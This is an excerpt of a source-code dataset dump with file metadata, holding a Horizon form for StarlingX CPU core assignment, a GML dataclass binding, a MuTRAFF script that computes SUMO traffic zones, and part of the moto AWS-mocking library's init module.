self.fields[
'num_cores_on_processor2'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor3'].widget = forms.widgets.HiddenInput()
else:
if kwargs['initial'][
'num_cores_on_processor0'] == 99:
self.fields[
'num_cores_on_processor0'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields[
'num_cores_on_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor1'] == 99:
self.fields[
'num_cores_on_processor1'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields[
'num_cores_on_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor2'] == 99:
self.fields[
'num_cores_on_processor2'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields[
'num_cores_on_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor2'].help_text =\
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor3'] == 99:
self.fields[
'num_cores_on_processor3'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields[
'num_cores_on_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor3'].help_text =\
"Processor 3 has %s physical cores." % avail_socket_cores
for s in range(0, 4):
processor = 'num_shared_on_processor{0}'.format(s)
if ('compute' not in self.host.subfunctions or
kwargs['initial'][processor] == 99):
self.fields[processor].widget = forms.widgets.HiddenInput()
else:
self.fields[processor].set_max_value(1)
self.fields[processor].help_text =\
"Each processor can have at most one shared core."
def clean(self):
cleaned_data = super(UpdateCpuFunctions, self).clean()
try:
cleaned_data['platform_processor0'] = str(
cleaned_data['platform_processor0'])
cleaned_data['platform_processor1'] = str(
cleaned_data['platform_processor1'])
cleaned_data['platform_processor2'] = str(
cleaned_data['platform_processor2'])
cleaned_data['platform_processor3'] = str(
cleaned_data['platform_processor3'])
cleaned_data['num_cores_on_processor0'] = str(
cleaned_data['num_cores_on_processor0'])
cleaned_data['num_cores_on_processor1'] = str(
cleaned_data['num_cores_on_processor1'])
cleaned_data['num_cores_on_processor2'] = str(
cleaned_data['num_cores_on_processor2'])
cleaned_data['num_cores_on_processor3'] = str(
cleaned_data['num_cores_on_processor3'])
cleaned_data['num_shared_on_processor0'] = str(
cleaned_data['num_shared_on_processor0'])
cleaned_data['num_shared_on_processor1'] = str(
cleaned_data['num_shared_on_processor1'])
cleaned_data['num_shared_on_processor2'] = str(
cleaned_data['num_shared_on_processor2'])
cleaned_data['num_shared_on_processor3'] = str(
cleaned_data['num_shared_on_processor3'])
num_platform_cores = {}
num_platform_cores[0] = cleaned_data.get('platform_processor0',
'None')
num_platform_cores[1] = cleaned_data.get('platform_processor1',
'None')
num_platform_cores[2] = cleaned_data.get('platform_processor2',
'None')
num_platform_cores[3] = cleaned_data.get('platform_processor3',
'None')
num_vswitch_cores = {}
num_vswitch_cores[0] = cleaned_data.get('num_cores_on_processor0',
'None')
num_vswitch_cores[1] = cleaned_data.get('num_cores_on_processor1',
'None')
num_vswitch_cores[2] = cleaned_data.get('num_cores_on_processor2',
'None')
num_vswitch_cores[3] = cleaned_data.get('num_cores_on_processor3',
'None')
num_shared_on_map = {}
num_shared_on_map[0] = cleaned_data.get('num_shared_on_processor0',
'None')
num_shared_on_map[1] = cleaned_data.get('num_shared_on_processor1',
'None')
num_shared_on_map[2] = cleaned_data.get('num_shared_on_processor2',
'None')
num_shared_on_map[3] = cleaned_data.get('num_shared_on_processor3',
'None')
if ('None' in num_platform_cores.values() or
'None' in num_vswitch_cores.values() or
'None' in num_shared_on_map.values()):
raise forms.ValidationError(_("Invalid entry."))
except Exception as e:
LOG.error(e)
raise forms.ValidationError(_("Invalid entry."))
cleaned_data['function'] = 'vswitch'
return cleaned_data
def handle(self, request, data):
host_id = data['host_id']
del data['host_id']
del data['host']
try:
host = sysinv.host_get(self.request, host_id)
cpudata = {}
sharedcpudata = {}
platformcpudata = {}
for key, val in data.items():
if 'num_cores_on_processor' in key or 'function' in key:
if key not in self.fields:
cpudata[key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
cpudata[key] = val
if 'platform_processor' in key:
update_key = 'num_cores_on_processor' + key[-1:]
if key not in self.fields:
platformcpudata[update_key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
platformcpudata[update_key] = val
if 'num_shared_on_processor' in key:
key2 = key.replace('shared', 'cores')
if key not in self.fields:
sharedcpudata[key2] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
sharedcpudata[key2] = val
sharedcpudata['function'] = 'shared'
platformcpudata['function'] = 'platform'
sysinv.host_cpus_modify(request, host.uuid,
platformcpudata,
cpudata,
sharedcpudata)
msg = _('CPU Assignments were successfully updated.')
LOG.debug(msg)
messages.success(request, msg)
return self.host.cpus
except exc.ClientException as ce:
messages.error(request, ce)
LOG.error(ce)
redirect = reverse(self.failure_url, args=[host_id])
return shortcuts.redirect(redirect)
except Exception as e:
LOG.exception(e)
msg = _('Failed to update CPU Assignments.')
LOG.info(msg)
redirect = reverse(self.failure_url, args=[host_id])
exceptions.handle(request, msg, redirect=redirect)
class AddCpuProfile(forms.SelfHandlingForm):
host_id = forms.CharField(widget=forms.widgets.HiddenInput)
profilename = forms.CharField(label=_("Cpu Profile Name"),
required=True)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(AddCpuProfile, self).__init__(*args, **kwargs)
def clean(self):
cleaned_data = super(AddCpuProfile, self).clean()
return cleaned_data
def handle(self, request, data):
cpuProfileName = data['profilename']
try:
cpuProfile = sysinv.host_cpuprofile_create(request, **data)
msg = _(
'Cpu Profile "%s" was successfully created.') % cpuProfileName
LOG.debug(msg)
messages.success(request, msg)
return cpuProfile
except exc.ClientException as ce:
messages.error(request, ce)
LOG.error(ce)
redirect = reverse(self.failure_url, args=[data['host_id']])
return shortcuts.redirect(redirect)
except Exception:
msg = _('Failed to create cpu profile "%s".') % cpuProfileName
LOG.info(msg)
redirect = reverse(self.failure_url,
args=[data['host_id']])
exceptions.handle(request, msg, redirect=redirect)
| true
| true
|
f7191d9a9dc651d2b6f271add852f02c238d421a
| 272
|
py
|
Python
|
catalog/bindings/csw/crs_ref.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
catalog/bindings/csw/crs_ref.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
catalog/bindings/csw/crs_ref.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
from dataclasses import dataclass
from bindings.csw.general_conversion_ref_type import CrsrefType
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class CrsRef(CrsrefType):
class Meta:
name = "crsRef"
namespace = "http://www.opengis.net/gml"
| 22.666667
| 63
| 0.731618
|
from dataclasses import dataclass
from bindings.csw.general_conversion_ref_type import CrsrefType
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class CrsRef(CrsrefType):
class Meta:
name = "crsRef"
namespace = "http://www.opengis.net/gml"
| true
| true
|
f7191efcb8f233967b15e0f9433e0c54a591c370
| 3,760
|
py
|
Python
|
tools/TAZ_CALCULATOR/mutraff_tazcalc.py
|
uahservtel/uah-gist-mutraff-bastra
|
b5a4eab4763e1cf9d914c4af8a77426391e71e31
|
[
"Xnet",
"Linux-OpenIB",
"X11"
] | 3
|
2019-11-20T15:22:27.000Z
|
2021-06-13T07:52:14.000Z
|
tools/TAZ_CALCULATOR/mutraff_tazcalc.py
|
uahservtel/uah-gist-mutraff-bastra
|
b5a4eab4763e1cf9d914c4af8a77426391e71e31
|
[
"Xnet",
"Linux-OpenIB",
"X11"
] | null | null | null |
tools/TAZ_CALCULATOR/mutraff_tazcalc.py
|
uahservtel/uah-gist-mutraff-bastra
|
b5a4eab4763e1cf9d914c4af8a77426391e71e31
|
[
"Xnet",
"Linux-OpenIB",
"X11"
] | null | null | null |
'''
Created on 09/12/2016
@author: Alvaro Paricio
@description: Calculator of TRAFFIC ASSIGNMENT ZONES (TAZ). Given a networkfile and a polygon description, get all the nodes of the network included inside the polygon.
'''
import sys
sys.path.insert(1,'lib')
import argparse as arg
from TazGeometry import taz_test, MuTazCalculator
# --------------------------------------------------------------
opts= {}
# --------------------------------------------------------------
def getConfig():
parser = arg.ArgumentParser(
prog="mutraff_tazcalc",
formatter_class=arg.RawDescriptionHelpFormatter,
description='''\
MuTRAFF TAZ Calculator
Given an XML taz definition file based on polygon coordinates in GPS format(lat,lon), generate the associated SUMO TAZ definiton file with the edges contained inside each taz polygon.
Examples:
* Generate the TAZs associated to a given polygon:
python mutraff_tazcalc.py -net alcalahenares.net.xml -nod alcalahenares.nod.xml -edg alcalahenares.edg.xml -mutaz alcalahenares.mutaz.xml -sumo_taz alcalahenares.taz.xml
''')
# REQUIRED OPTS
parser.add_argument( "-net","--in-net", help='Input. SUMOs XML net description file', default="mutraff.net.xml", required=True)
parser.add_argument( "-nod","--in-nodes", help='Input. SUMOs XML nodes description file', default="mutraff.nod.xml", required=True)
parser.add_argument( "-edg","--in-edges", help='Input. SUMOs XML edges description file', default="mutraff.edg.xml", required=True)
parser.add_argument( "-mutaz","--in-mutaz", help='Input. MUTRAFF XML description file', default="mutraff.mutaz.xml", required=True)
# OPTIONAL OPTS
parser.add_argument( "-sumo_taz","--out-sumo-taz", help='Output. Generate output to SUMO TAZ XML description file', required=False)
parser.add_argument( "-p","--net-path", help='Input. Path to locate files', default='.' )
parser.add_argument( "-v","--verbose", help='Verbose output', default=False, action='store_true')
parser.add_argument( "-t","--run-tests", help='Run tests', default=False, action='store_true')
parser.add_argument( "-i","--taz-id-seed", help='USe this number as TAZ id numbering seed', default="1000", required=False)
options = vars(parser.parse_args())
options['in_net'] = options['net_path'] + '/' + options['in_net']
options['in_nodes'] = options['net_path'] + '/' + options['in_nodes']
options['in_edges'] = options['net_path'] + '/' + options['in_edges']
options['in_mutaz'] = options['net_path'] + '/' + options['in_mutaz']
if 'out_sumo_taz' in options and options['out_sumo_taz']:
options['out_sumo_taz'] = options['net_path'] + '/' + options['out_sumo_taz']
if( options['verbose'] ):
print(options)
return options
# --------------------------------------------------------------
def printBanner():
# Take here the banner: http://patorjk.com/software/taag/#p=display&f=Doom&t=mutraff%20odgen
# Font: Doom
print(" _ __ __ _ _ ")
print(" | | / _|/ _| | | | | ")
print(" _ __ ___ _ _| |_ _ __ __ _| |_| |_ | |_ __ _ _______ __ _| | ___ ")
print("| '_ ` _ \| | | | __| '__/ _` | _| _| | __/ _` |_ / __/ _` | |/ __|")
print("| | | | | | |_| | |_| | | (_| | | | | | || (_| |/ / (_| (_| | | (__ ")
print("|_| |_| |_|\__,_|\__|_| \__,_|_| |_| \__\__,_/___\___\__,_|_|\___|\n")
print(" MUTRAFF TAZ Calculator")
print(" alvaro.paricio@uah.es")
print("")
if __name__ == '__main__':
printBanner()
opts=getConfig()
if( opts['run_tests'] ):
taz_test()
else:
tazcalc = MuTazCalculator(opts)
tazcalc.loadData()
tazcalc.calculateTazs()
tazcalc.dumpTazFile()
| 45.301205
| 183
| 0.611702
|
import sys
sys.path.insert(1,'lib')
import argparse as arg
from TazGeometry import taz_test, MuTazCalculator
opts= {}
def getConfig():
parser = arg.ArgumentParser(
prog="mutraff_tazcalc",
formatter_class=arg.RawDescriptionHelpFormatter,
description='''\
MuTRAFF TAZ Calculator
Given an XML taz definition file based on polygon coordinates in GPS format(lat,lon), generate the associated SUMO TAZ definiton file with the edges contained inside each taz polygon.
Examples:
* Generate the TAZs associated to a given polygon:
python mutraff_tazcalc.py -net alcalahenares.net.xml -nod alcalahenares.nod.xml -edg alcalahenares.edg.xml -mutaz alcalahenares.mutaz.xml -sumo_taz alcalahenares.taz.xml
''')
parser.add_argument( "-net","--in-net", help='Input. SUMOs XML net description file', default="mutraff.net.xml", required=True)
parser.add_argument( "-nod","--in-nodes", help='Input. SUMOs XML nodes description file', default="mutraff.nod.xml", required=True)
parser.add_argument( "-edg","--in-edges", help='Input. SUMOs XML edges description file', default="mutraff.edg.xml", required=True)
parser.add_argument( "-mutaz","--in-mutaz", help='Input. MUTRAFF XML description file', default="mutraff.mutaz.xml", required=True)
parser.add_argument( "-sumo_taz","--out-sumo-taz", help='Output. Generate output to SUMO TAZ XML description file', required=False)
parser.add_argument( "-p","--net-path", help='Input. Path to locate files', default='.' )
parser.add_argument( "-v","--verbose", help='Verbose output', default=False, action='store_true')
parser.add_argument( "-t","--run-tests", help='Run tests', default=False, action='store_true')
parser.add_argument( "-i","--taz-id-seed", help='USe this number as TAZ id numbering seed', default="1000", required=False)
options = vars(parser.parse_args())
options['in_net'] = options['net_path'] + '/' + options['in_net']
options['in_nodes'] = options['net_path'] + '/' + options['in_nodes']
options['in_edges'] = options['net_path'] + '/' + options['in_edges']
options['in_mutaz'] = options['net_path'] + '/' + options['in_mutaz']
if 'out_sumo_taz' in options and options['out_sumo_taz']:
options['out_sumo_taz'] = options['net_path'] + '/' + options['out_sumo_taz']
if( options['verbose'] ):
print(options)
return options
def printBanner():
__ __ _ _ ")
print(" | | / _|/ _| | | | | ")
print(" _ __ ___ _ _| |_ _ __ __ _| |_| |_ | |_ __ _ _______ __ _| | ___ ")
print("| '_ ` _ \| | | | __| '__/ _` | _| _| | __/ _` |_ / __/ _` | |/ __|")
print("| | | | | | |_| | |_| | | (_| | | | | | || (_| |/ / (_| (_| | | (__ ")
print("|_| |_| |_|\__,_|\__|_| \__,_|_| |_| \__\__,_/___\___\__,_|_|\___|\n")
print(" MUTRAFF TAZ Calculator")
print(" alvaro.paricio@uah.es")
print("")
if __name__ == '__main__':
printBanner()
opts=getConfig()
if( opts['run_tests'] ):
taz_test()
else:
tazcalc = MuTazCalculator(opts)
tazcalc.loadData()
tazcalc.calculateTazs()
tazcalc.dumpTazFile()
| true
| true
|
f7191f1eaaa578d51a94826ccc2ece39d7ec093d
| 9,695
|
py
|
Python
|
moto/__init__.py
|
hudelgado/moto
|
b8cd79cd06a6cc591b0a51086ead50609af4dd4d
|
[
"Apache-2.0"
] | null | null | null |
moto/__init__.py
|
hudelgado/moto
|
b8cd79cd06a6cc591b0a51086ead50609af4dd4d
|
[
"Apache-2.0"
] | null | null | null |
moto/__init__.py
|
hudelgado/moto
|
b8cd79cd06a6cc591b0a51086ead50609af4dd4d
|
[
"Apache-2.0"
] | null | null | null |
import importlib
import sys
from contextlib import ContextDecorator
def lazy_load(
module_name, element, boto3_name=None, backend=None, warn_repurpose=False
):
def f(*args, **kwargs):
if warn_repurpose:
import warnings
warnings.warn(
f"Module {element} has been deprecated, and will be repurposed in a later release. "
"Please see https://github.com/spulec/moto/issues/4526 for more information."
)
module = importlib.import_module(module_name, "moto")
return getattr(module, element)(*args, **kwargs)
setattr(f, "name", module_name.replace(".", ""))
setattr(f, "element", element)
setattr(f, "boto3_name", boto3_name or f.name)
setattr(f, "backend", backend or f"{f.name}_backends")
return f
mock_acm = lazy_load(".acm", "mock_acm")
mock_apigateway = lazy_load(".apigateway", "mock_apigateway")
mock_apigateway_deprecated = lazy_load(".apigateway", "mock_apigateway_deprecated")
mock_athena = lazy_load(".athena", "mock_athena")
mock_applicationautoscaling = lazy_load(
".applicationautoscaling", "mock_applicationautoscaling"
)
mock_autoscaling = lazy_load(".autoscaling", "mock_autoscaling")
mock_autoscaling_deprecated = lazy_load(".autoscaling", "mock_autoscaling_deprecated")
mock_lambda = lazy_load(
".awslambda", "mock_lambda", boto3_name="lambda", backend="lambda_backends"
)
mock_lambda_deprecated = lazy_load(".awslambda", "mock_lambda_deprecated")
mock_batch = lazy_load(".batch", "mock_batch")
mock_budgets = lazy_load(".budgets", "mock_budgets")
mock_cloudformation = lazy_load(".cloudformation", "mock_cloudformation")
mock_cloudformation_deprecated = lazy_load(
".cloudformation", "mock_cloudformation_deprecated"
)
mock_cloudfront = lazy_load(".cloudfront", "mock_cloudfront")
mock_cloudtrail = lazy_load(".cloudtrail", "mock_cloudtrail", boto3_name="cloudtrail")
mock_cloudwatch = lazy_load(".cloudwatch", "mock_cloudwatch")
mock_cloudwatch_deprecated = lazy_load(".cloudwatch", "mock_cloudwatch_deprecated")
mock_codecommit = lazy_load(".codecommit", "mock_codecommit")
mock_codepipeline = lazy_load(".codepipeline", "mock_codepipeline")
mock_cognitoidentity = lazy_load(
".cognitoidentity", "mock_cognitoidentity", boto3_name="cognito-identity"
)
mock_cognitoidentity_deprecated = lazy_load(
".cognitoidentity", "mock_cognitoidentity_deprecated"
)
mock_cognitoidp = lazy_load(".cognitoidp", "mock_cognitoidp", boto3_name="cognito-idp")
mock_cognitoidp_deprecated = lazy_load(".cognitoidp", "mock_cognitoidp_deprecated")
mock_config = lazy_load(".config", "mock_config")
mock_datapipeline = lazy_load(".datapipeline", "mock_datapipeline")
mock_datapipeline_deprecated = lazy_load(
".datapipeline", "mock_datapipeline_deprecated"
)
mock_datasync = lazy_load(".datasync", "mock_datasync")
mock_dms = lazy_load(".dms", "mock_dms")
mock_ds = lazy_load(".ds", "mock_ds", boto3_name="ds")
mock_dynamodb = lazy_load(".dynamodb", "mock_dynamodb", warn_repurpose=True)
mock_dynamodb_deprecated = lazy_load(".dynamodb", "mock_dynamodb_deprecated")
mock_dynamodb2 = lazy_load(".dynamodb2", "mock_dynamodb2", backend="dynamodb_backends2")
mock_dynamodb2_deprecated = lazy_load(".dynamodb2", "mock_dynamodb2_deprecated")
mock_dynamodbstreams = lazy_load(".dynamodbstreams", "mock_dynamodbstreams")
mock_elasticbeanstalk = lazy_load(
".elasticbeanstalk", "mock_elasticbeanstalk", backend="eb_backends"
)
mock_ec2 = lazy_load(".ec2", "mock_ec2")
mock_ec2_deprecated = lazy_load(".ec2", "mock_ec2_deprecated")
mock_ec2instanceconnect = lazy_load(".ec2instanceconnect", "mock_ec2instanceconnect")
mock_ecr = lazy_load(".ecr", "mock_ecr")
mock_ecr_deprecated = lazy_load(".ecr", "mock_ecr_deprecated")
mock_ecs = lazy_load(".ecs", "mock_ecs")
mock_ecs_deprecated = lazy_load(".ecs", "mock_ecs_deprecated")
mock_elastictranscoder = lazy_load(".elastictranscoder", "mock_elastictranscoder")
mock_elb = lazy_load(".elb", "mock_elb")
mock_elb_deprecated = lazy_load(".elb", "mock_elb_deprecated")
mock_elbv2 = lazy_load(".elbv2", "mock_elbv2")
mock_emr = lazy_load(".emr", "mock_emr")
mock_emr_deprecated = lazy_load(".emr", "mock_emr_deprecated")
mock_emrcontainers = lazy_load(
".emrcontainers", "mock_emrcontainers", boto3_name="emr-containers"
)
mock_events = lazy_load(".events", "mock_events")
mock_firehose = lazy_load(".firehose", "mock_firehose")
mock_forecast = lazy_load(".forecast", "mock_forecast")
mock_glacier = lazy_load(".glacier", "mock_glacier")
mock_glacier_deprecated = lazy_load(".glacier", "mock_glacier_deprecated")
mock_glue = lazy_load(".glue", "mock_glue")
mock_guardduty = lazy_load(".guardduty", "mock_guardduty")
mock_iam = lazy_load(".iam", "mock_iam")
mock_iam_deprecated = lazy_load(".iam", "mock_iam_deprecated")
mock_iot = lazy_load(".iot", "mock_iot")
mock_iotdata = lazy_load(".iotdata", "mock_iotdata", boto3_name="iot-data")
mock_kinesis = lazy_load(".kinesis", "mock_kinesis")
mock_kinesis_deprecated = lazy_load(".kinesis", "mock_kinesis_deprecated")
mock_kms = lazy_load(".kms", "mock_kms")
mock_kms_deprecated = lazy_load(".kms", "mock_kms_deprecated")
mock_logs = lazy_load(".logs", "mock_logs")
mock_logs_deprecated = lazy_load(".logs", "mock_logs_deprecated")
mock_managedblockchain = lazy_load(".managedblockchain", "mock_managedblockchain")
mock_opsworks = lazy_load(".opsworks", "mock_opsworks")
mock_opsworks_deprecated = lazy_load(".opsworks", "mock_opsworks_deprecated")
mock_organizations = lazy_load(".organizations", "mock_organizations")
mock_polly = lazy_load(".polly", "mock_polly")
mock_ram = lazy_load(".ram", "mock_ram")
mock_rds = lazy_load(".rds", "mock_rds", warn_repurpose=True)
mock_rds_deprecated = lazy_load(".rds", "mock_rds_deprecated")
mock_rds2 = lazy_load(".rds2", "mock_rds2", boto3_name="rds")
mock_rds2_deprecated = lazy_load(".rds2", "mock_rds2_deprecated")
mock_redshift = lazy_load(".redshift", "mock_redshift")
mock_redshift_deprecated = lazy_load(".redshift", "mock_redshift_deprecated")
mock_resourcegroups = lazy_load(
".resourcegroups", "mock_resourcegroups", boto3_name="resource-groups"
)
mock_resourcegroupstaggingapi = lazy_load(
".resourcegroupstaggingapi", "mock_resourcegroupstaggingapi"
)
mock_route53 = lazy_load(".route53", "mock_route53")
mock_route53_deprecated = lazy_load(".route53", "mock_route53_deprecated")
mock_route53resolver = lazy_load(
".route53resolver", "mock_route53resolver", boto3_name="route53resolver"
)
mock_s3 = lazy_load(".s3", "mock_s3")
mock_s3_deprecated = lazy_load(".s3", "mock_s3_deprecated")
mock_sagemaker = lazy_load(".sagemaker", "mock_sagemaker")
mock_secretsmanager = lazy_load(".secretsmanager", "mock_secretsmanager")
mock_ses = lazy_load(".ses", "mock_ses")
mock_ses_deprecated = lazy_load(".ses", "mock_ses_deprecated")
mock_sns = lazy_load(".sns", "mock_sns")
mock_sns_deprecated = lazy_load(".sns", "mock_sns_deprecated")
mock_sqs = lazy_load(".sqs", "mock_sqs")
mock_sqs_deprecated = lazy_load(".sqs", "mock_sqs_deprecated")
mock_ssm = lazy_load(".ssm", "mock_ssm")
mock_stepfunctions = lazy_load(
".stepfunctions", "mock_stepfunctions", backend="stepfunction_backends"
)
mock_sts = lazy_load(".sts", "mock_sts")
mock_sts_deprecated = lazy_load(".sts", "mock_sts_deprecated")
mock_swf = lazy_load(".swf", "mock_swf")
mock_swf_deprecated = lazy_load(".swf", "mock_swf_deprecated")
mock_timestreamwrite = lazy_load(
".timestreamwrite", "mock_timestreamwrite", boto3_name="timestream-write"
)
mock_transcribe = lazy_load(".transcribe", "mock_transcribe")
XRaySegment = lazy_load(".xray", "XRaySegment")
mock_xray = lazy_load(".xray", "mock_xray")
mock_xray_client = lazy_load(".xray", "mock_xray_client")
mock_kinesisvideo = lazy_load(".kinesisvideo", "mock_kinesisvideo")
mock_kinesisvideoarchivedmedia = lazy_load(
".kinesisvideoarchivedmedia",
"mock_kinesisvideoarchivedmedia",
boto3_name="kinesis-video-archived-media",
)
mock_medialive = lazy_load(".medialive", "mock_medialive")
mock_support = lazy_load(".support", "mock_support")
mock_mediaconnect = lazy_load(".mediaconnect", "mock_mediaconnect")
mock_mediapackage = lazy_load(".mediapackage", "mock_mediapackage")
mock_mediastore = lazy_load(".mediastore", "mock_mediastore")
mock_eks = lazy_load(".eks", "mock_eks")
mock_mediastoredata = lazy_load(
".mediastoredata", "mock_mediastoredata", boto3_name="mediastore-data"
)
mock_efs = lazy_load(".efs", "mock_efs")
mock_wafv2 = lazy_load(".wafv2", "mock_wafv2")
mock_sdb = lazy_load(".sdb", "mock_sdb")
mock_elasticache = lazy_load(
".elasticache", "mock_elasticache", boto3_name="elasticache"
)
class MockAll(ContextDecorator):
def __init__(self):
self.mocks = []
for mock in dir(sys.modules["moto"]):
if (
mock.startswith("mock_")
and not mock.endswith("_deprecated")
and not mock == ("mock_all")
):
self.mocks.append(globals()[mock]())
def __enter__(self):
for mock in self.mocks:
mock.start()
def __exit__(self, *exc):
for mock in self.mocks:
mock.stop()
mock_all = MockAll
# import logging
# logging.getLogger('boto').setLevel(logging.CRITICAL)
__title__ = "moto"
__version__ = "2.2.18.dev"
try:
# Need to monkey-patch botocore requests back to underlying urllib3 classes
from botocore.awsrequest import (
HTTPSConnectionPool,
HTTPConnectionPool,
HTTPConnection,
VerifiedHTTPSConnection,
)
except ImportError:
pass
else:
HTTPSConnectionPool.ConnectionCls = VerifiedHTTPSConnection
HTTPConnectionPool.ConnectionCls = HTTPConnection
| 43.671171
| 100
| 0.749252
|
import importlib
import sys
from contextlib import ContextDecorator
def lazy_load(
module_name, element, boto3_name=None, backend=None, warn_repurpose=False
):
def f(*args, **kwargs):
if warn_repurpose:
import warnings
warnings.warn(
f"Module {element} has been deprecated, and will be repurposed in a later release. "
"Please see https://github.com/spulec/moto/issues/4526 for more information."
)
module = importlib.import_module(module_name, "moto")
return getattr(module, element)(*args, **kwargs)
setattr(f, "name", module_name.replace(".", ""))
setattr(f, "element", element)
setattr(f, "boto3_name", boto3_name or f.name)
setattr(f, "backend", backend or f"{f.name}_backends")
return f
mock_acm = lazy_load(".acm", "mock_acm")
mock_apigateway = lazy_load(".apigateway", "mock_apigateway")
mock_apigateway_deprecated = lazy_load(".apigateway", "mock_apigateway_deprecated")
mock_athena = lazy_load(".athena", "mock_athena")
mock_applicationautoscaling = lazy_load(
".applicationautoscaling", "mock_applicationautoscaling"
)
mock_autoscaling = lazy_load(".autoscaling", "mock_autoscaling")
mock_autoscaling_deprecated = lazy_load(".autoscaling", "mock_autoscaling_deprecated")
mock_lambda = lazy_load(
".awslambda", "mock_lambda", boto3_name="lambda", backend="lambda_backends"
)
mock_lambda_deprecated = lazy_load(".awslambda", "mock_lambda_deprecated")
mock_batch = lazy_load(".batch", "mock_batch")
mock_budgets = lazy_load(".budgets", "mock_budgets")
mock_cloudformation = lazy_load(".cloudformation", "mock_cloudformation")
mock_cloudformation_deprecated = lazy_load(
".cloudformation", "mock_cloudformation_deprecated"
)
mock_cloudfront = lazy_load(".cloudfront", "mock_cloudfront")
mock_cloudtrail = lazy_load(".cloudtrail", "mock_cloudtrail", boto3_name="cloudtrail")
mock_cloudwatch = lazy_load(".cloudwatch", "mock_cloudwatch")
mock_cloudwatch_deprecated = lazy_load(".cloudwatch", "mock_cloudwatch_deprecated")
mock_codecommit = lazy_load(".codecommit", "mock_codecommit")
mock_codepipeline = lazy_load(".codepipeline", "mock_codepipeline")
mock_cognitoidentity = lazy_load(
".cognitoidentity", "mock_cognitoidentity", boto3_name="cognito-identity"
)
mock_cognitoidentity_deprecated = lazy_load(
".cognitoidentity", "mock_cognitoidentity_deprecated"
)
mock_cognitoidp = lazy_load(".cognitoidp", "mock_cognitoidp", boto3_name="cognito-idp")
mock_cognitoidp_deprecated = lazy_load(".cognitoidp", "mock_cognitoidp_deprecated")
mock_config = lazy_load(".config", "mock_config")
mock_datapipeline = lazy_load(".datapipeline", "mock_datapipeline")
mock_datapipeline_deprecated = lazy_load(
".datapipeline", "mock_datapipeline_deprecated"
)
mock_datasync = lazy_load(".datasync", "mock_datasync")
mock_dms = lazy_load(".dms", "mock_dms")
mock_ds = lazy_load(".ds", "mock_ds", boto3_name="ds")
mock_dynamodb = lazy_load(".dynamodb", "mock_dynamodb", warn_repurpose=True)
mock_dynamodb_deprecated = lazy_load(".dynamodb", "mock_dynamodb_deprecated")
mock_dynamodb2 = lazy_load(".dynamodb2", "mock_dynamodb2", backend="dynamodb_backends2")
mock_dynamodb2_deprecated = lazy_load(".dynamodb2", "mock_dynamodb2_deprecated")
mock_dynamodbstreams = lazy_load(".dynamodbstreams", "mock_dynamodbstreams")
mock_elasticbeanstalk = lazy_load(
".elasticbeanstalk", "mock_elasticbeanstalk", backend="eb_backends"
)
mock_ec2 = lazy_load(".ec2", "mock_ec2")
mock_ec2_deprecated = lazy_load(".ec2", "mock_ec2_deprecated")
mock_ec2instanceconnect = lazy_load(".ec2instanceconnect", "mock_ec2instanceconnect")
mock_ecr = lazy_load(".ecr", "mock_ecr")
mock_ecr_deprecated = lazy_load(".ecr", "mock_ecr_deprecated")
mock_ecs = lazy_load(".ecs", "mock_ecs")
mock_ecs_deprecated = lazy_load(".ecs", "mock_ecs_deprecated")
mock_elastictranscoder = lazy_load(".elastictranscoder", "mock_elastictranscoder")
mock_elb = lazy_load(".elb", "mock_elb")
mock_elb_deprecated = lazy_load(".elb", "mock_elb_deprecated")
mock_elbv2 = lazy_load(".elbv2", "mock_elbv2")
mock_emr = lazy_load(".emr", "mock_emr")
mock_emr_deprecated = lazy_load(".emr", "mock_emr_deprecated")
mock_emrcontainers = lazy_load(
".emrcontainers", "mock_emrcontainers", boto3_name="emr-containers"
)
mock_events = lazy_load(".events", "mock_events")
mock_firehose = lazy_load(".firehose", "mock_firehose")
mock_forecast = lazy_load(".forecast", "mock_forecast")
mock_glacier = lazy_load(".glacier", "mock_glacier")
mock_glacier_deprecated = lazy_load(".glacier", "mock_glacier_deprecated")
mock_glue = lazy_load(".glue", "mock_glue")
mock_guardduty = lazy_load(".guardduty", "mock_guardduty")
mock_iam = lazy_load(".iam", "mock_iam")
mock_iam_deprecated = lazy_load(".iam", "mock_iam_deprecated")
mock_iot = lazy_load(".iot", "mock_iot")
mock_iotdata = lazy_load(".iotdata", "mock_iotdata", boto3_name="iot-data")
mock_kinesis = lazy_load(".kinesis", "mock_kinesis")
mock_kinesis_deprecated = lazy_load(".kinesis", "mock_kinesis_deprecated")
mock_kms = lazy_load(".kms", "mock_kms")
mock_kms_deprecated = lazy_load(".kms", "mock_kms_deprecated")
mock_logs = lazy_load(".logs", "mock_logs")
mock_logs_deprecated = lazy_load(".logs", "mock_logs_deprecated")
mock_managedblockchain = lazy_load(".managedblockchain", "mock_managedblockchain")
mock_opsworks = lazy_load(".opsworks", "mock_opsworks")
